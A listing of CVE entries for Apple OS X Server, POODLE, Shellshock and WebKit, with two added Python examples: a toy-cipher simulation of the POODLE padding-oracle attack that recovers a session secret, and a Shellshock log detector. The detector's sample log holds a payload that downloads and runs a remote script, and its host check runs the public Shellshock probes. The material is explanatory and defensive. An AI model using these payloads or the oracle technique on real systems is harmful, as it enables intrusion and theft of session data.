
CVE-2015-1151
https://notcve.org/view.php?id=CVE-2015-1151
28 Apr 2015 — Wiki Server in Apple OS X Server before 4.1 allows remote attackers to bypass intended restrictions on Activity and People pages by connecting from an iPad client. • http://lists.apple.com/archives/security-announce/2015/Apr/msg00006.html • CWE-284: Improper Access Control •

CVE-2015-1150
https://notcve.org/view.php?id=CVE-2015-1150
28 Apr 2015 — The Firewall component in Apple OS X Server before 4.1 uses an incorrect pathname in configuration files, which allows remote attackers to bypass network-access restrictions by sending packets for which custom-rule blocking was intended. • http://lists.apple.com/archives/security-announce/2015/Apr/msg00006.html • CWE-17: DEPRECATED: Code •

CVE-2014-4446 – Apple Security Advisory 2014-10-16-3
https://notcve.org/view.php?id=CVE-2014-4446
17 Oct 2014 — Mail Service in Apple OS X Server before 4.0 does not enforce SACL changes until after a service restart, which allows remote authenticated users to bypass intended access restrictions in opportunistic circumstances by leveraging a change made by an administrator. • http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html • CWE-264: Permissions, Privileges, and Access Controls •

CVE-2014-4447 – Apple Security Advisory 2014-10-16-3
https://notcve.org/view.php?id=CVE-2014-4447
17 Oct 2014 — Profile Manager in Apple OS X Server before 4.0 allows local users to discover cleartext passwords by reading a file after a (1) profile setup or (2) profile edit occurs. OS X Server 4.0 is now available and addresses vulnerabilities in BIND, Wiki server, Xcode server, PostgreSQL, a... • http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html • CWE-310: Cryptographic Issues •

CVE-2014-3566 – SSL/TLS Version Detection
https://notcve.org/view.php?id=CVE-2014-3566
15 Oct 2014 — The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue. • https://github.com/mikesplain/CVE-2014-3566-poodle-cookbook • CWE-298: Improper Validation of Certificate Expiration CWE-310: Cryptographic Issues CWE-319: Cleartext Transmission of Sensitive Information CWE-326: Inadequate Encryption Strength CWE-327: Use of a Broken or Risky Cryptographic Algorithm CWE-328: Use of Weak Hash CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') •
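Added example (not part of the notcve.org listing, and not OpenSSL code): a Python simulation of what "nondeterministic CBC padding" buys the attacker in POODLE. SSL 3.0 pads the record with arbitrary bytes and checks only the final length byte, so a receiver accepts a record whose padding block has been swapped for any other ciphertext block 1 time in 256, and each acceptance leaks that block's last plaintext byte. The toy 16-byte Feistel cipher, HMAC-SHA256 in place of the SSL 3.0 MAC, the keys and the "SESSION=" secret are all constructed assumptions; the attacker-chosen prefix and suffix lengths play the role of the browser-side JavaScript in the real attack.

```python
# POODLE (CVE-2014-3566) simulated against a toy CBC cipher: SSL 3.0 checks only
# the padding-length byte, so a receiver accepts a moved ciphertext block 1 time
# in 256 and thereby leaks that block's last plaintext byte. TLS-style strict
# padding closes the oracle. Toy Feistel cipher and HMAC-SHA256 are stand-ins
# (assumptions); key, MAC key and the "SESSION=" secret are constructed.
import hashlib
import hmac
import random

BLOCK, MAC_LEN = 16, 32

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):  # Feistel round function built from SHA-256
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return out

def server_accepts(key, mac_key, iv, ct, strict):
    """strict=False is the SSL 3.0 rule (length byte only); strict=True is the TLS rule."""
    pt = cbc_decrypt(key, iv, ct)
    padlen = pt[-1]
    if padlen >= BLOCK:
        return False
    if strict and any(b != padlen for b in pt[-(padlen + 1):]):
        return False
    body = pt[:len(pt) - padlen - 1]
    msg, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(hmac.new(mac_key, msg, hashlib.sha256).digest(), tag)

def victim_encrypt(key, mac_key, rng, prefix_len, secret, suffix_len):
    """Victim sends attacker-chosen filler around its secret; padding fills a whole block."""
    msg = b"A" * prefix_len + secret + b"B" * suffix_len
    body = msg + hmac.new(mac_key, msg, hashlib.sha256).digest()
    assert len(body) % BLOCK == 0
    # SSL 3.0 padding: BLOCK-1 arbitrary bytes, then the length byte. Only that
    # last byte is ever checked by the receiver.
    pad = bytes(rng.randrange(256) for _ in range(BLOCK - 1)) + bytes([BLOCK - 1])
    iv = bytes(rng.randrange(256) for _ in range(BLOCK))
    return iv, cbc_encrypt(key, iv, body + pad)

def recover_byte(key, mac_key, rng, secret, k, strict, max_attempts):
    """Recover secret[k] through the oracle; returns (byte, attempts) or None."""
    prefix_len = (BLOCK - 1 - k) % BLOCK                        # secret[k] ends a block
    suffix_len = -(prefix_len + len(secret) + MAC_LEN) % BLOCK  # padding is a full block
    i = (prefix_len + k) // BLOCK                               # block holding secret[k]
    for attempt in range(1, max_attempts + 1):
        iv, ct = victim_encrypt(key, mac_key, rng, prefix_len, secret, suffix_len)
        chain = [iv] + [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
        tampered = ct[:-BLOCK] + chain[i + 1]  # padding block replaced by C[i]
        if server_accepts(key, mac_key, iv, tampered, strict):
            # D(C[i]) XOR C[n-2] ended in BLOCK-1, and P[i] = D(C[i]) XOR C[i-1]
            # (C[-1] is the IV), so the last byte of P[i] follows directly.
            return (BLOCK - 1) ^ chain[-2][-1] ^ chain[i][-1], attempt
    return None

def recover_secret(key, mac_key, secret, seed=1, strict=False, max_attempts=10000):
    """Recover the whole secret byte by byte; None if the oracle never fires."""
    rng, out = random.Random(seed), bytearray()
    for k in range(len(secret)):
        hit = recover_byte(key, mac_key, rng, secret, k, strict, max_attempts)
        if hit is None:
            return None
        out.append(hit[0])
    return bytes(out)

if __name__ == "__main__":
    print(recover_secret(b"k" * 16, b"m" * 16, b"SESSION="))  # b'SESSION='
    print(recover_secret(b"k" * 16, b"m" * 16, b"SESSION=", strict=True, max_attempts=300))  # None
```

With the SSL 3.0 rule the loop needs about 256 victim requests per byte, which is the cost quoted for the real attack; with the TLS rule the same tampering is rejected unless all sixteen decrypted padding bytes happen to match, so the oracle never fires. The practical fix is the same as for the real bug: disable SSL 3.0 on both ends (and send TLS_FALLBACK_SCSV so an attacker cannot force a downgrade into it).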

CVE-2014-7169 – GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
https://notcve.org/view.php?id=CVE-2014-7169
25 Sep 2014 — GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a ... • https://packetstorm.news/files/id/128650 • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE-228: Improper Handling of Syntactically Invalid Structure •

CVE-2014-6271 – GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
https://notcve.org/view.php?id=CVE-2014-6271
24 Sep 2014 — GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." N... • https://packetstorm.news/files/id/181111 • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •
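Added example serving both Shellshock entries above (CVE-2014-6271 and the incomplete-fix follow-up CVE-2014-7169); it is not part of the notcve.org listing or of GNU Bash. Both bugs are reached over HTTP when a CGI handler copies request headers into environment variables before bash starts, and bash only treats a value that begins with "() {" as an exported function, so that marker at the start of a header value is the indicator to hunt for. The access-log lines are constructed, the IP addresses are documentation ranges, and `local_bash_status` assumes a POSIX host with bash on PATH; it runs the two public one-line checks (the `() { :;}; echo` probe for 6271 and the `() { (a)=>\` file-creation probe for 7169) inside a temporary directory.

```python
# Shellshock (CVE-2014-6271 / CVE-2014-7169) indicators, in web logs and on the host.
import os
import re
import subprocess
import tempfile

# Bash only parses an exported value that BEGINS with "() {" as a function, so
# the marker must sit at the start of the header value. The 7169 variant sends
# "() { (a)=>\" and abuses the parser's error handling instead of appending commands.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample, not real traffic. Apache writes a backslash as "\\" in the log.
SAMPLE_LOG = r"""203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.9/x -O /tmp/x; sh /tmp/x'"
203.0.113.6 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { (a)=>\\" "curl/7.30"
198.51.100.7 - - [25/Sep/2014:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.8 - - [25/Sep/2014:10:03:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 () {test} (compatible)"
"""

def shellshock_hits(log_text):
    """Return (line number, client IP, field) for each header value that starts with the marker."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = COMBINED_RE.match(line)
        if not m:
            continue
        # Only Referer and User-Agent survive in the combined format; any header the
        # CGI handler exports (Cookie, Host, ...) is an equally valid carrier.
        for field in ("referer", "ua"):
            if SHELLSHOCK_RE.match(m.group(field)):
                hits.append((lineno, m.group("ip"), field))
    return hits

def local_bash_status(bash="bash"):
    """Run the two public one-liners against the local bash; True means the bug is present.

    Returns None when bash cannot be executed. Assumes a POSIX host (assumption).
    """
    env = dict(os.environ)
    try:
        probe = subprocess.run([bash, "-c", "echo probe"],
                               env={**env, "x": "() { :;}; echo VULNERABLE"},
                               capture_output=True, text=True, timeout=10)
        with tempfile.TemporaryDirectory() as d:
            # A bash lacking the 7169 fix mis-parses the trailing "\" and effectively
            # runs ">echo date", so a file named "echo" appears in the cwd.
            subprocess.run([bash, "-c", "echo date"], env={**env, "X": "() { (a)=>\\"},
                           cwd=d, capture_output=True, text=True, timeout=10)
            cve_7169 = os.path.exists(os.path.join(d, "echo"))
    except (OSError, subprocess.SubprocessError):
        return None
    return {"CVE-2014-6271": "VULNERABLE" in probe.stdout, "CVE-2014-7169": cve_7169}

if __name__ == "__main__":
    for hit in shellshock_hits(SAMPLE_LOG):
        print("shellshock marker:", hit)
    print(local_bash_status())
```

The fourth sample line carries "() {" in the middle of a User-Agent and is deliberately not flagged: bash never parses it as a function, so alerting on the substring anywhere in the value trades fidelity for noise. Note that the 6271 probe is only a negative check for the complete fix; a bash that passes it can still fail the 7169 probe, which is exactly the situation the second CVE records.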

CVE-2014-4424 – Apple Security Advisory 2014-10-16-3
https://notcve.org/view.php?id=CVE-2014-4424
19 Sep 2014 — SQL injection vulnerability in Wiki Server in CoreCollaboration in Apple OS X Server before 2.2.3 and 3.x before 3.2.1 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. OS X Server 3.2.1 is now available and addresses arbitrary SQL execution, arbitr... • http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2014-4406 – Apple Security Advisory 2014-10-16-3
https://notcve.org/view.php?id=CVE-2014-4406
19 Sep 2014 — Cross-site scripting (XSS) vulnerability in Xcode Server in CoreCollaboration in Apple OS X Server before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. OS X Server 3.2.1 is now available and addresses arbitrary SQL execution, arbitrary javascrip... • http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVE-2013-0960 – Apple Security Advisory 2013-03-14-2
https://notcve.org/view.php?id=CVE-2013-0960
15 Mar 2013 — WebKit in Apple Safari before 6.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2013-0961. iTunes 11.0.3 is now available and addresses multiple vulnerabilities.... • http://lists.apple.com/archives/security-announce/2013/Mar/msg00003.html •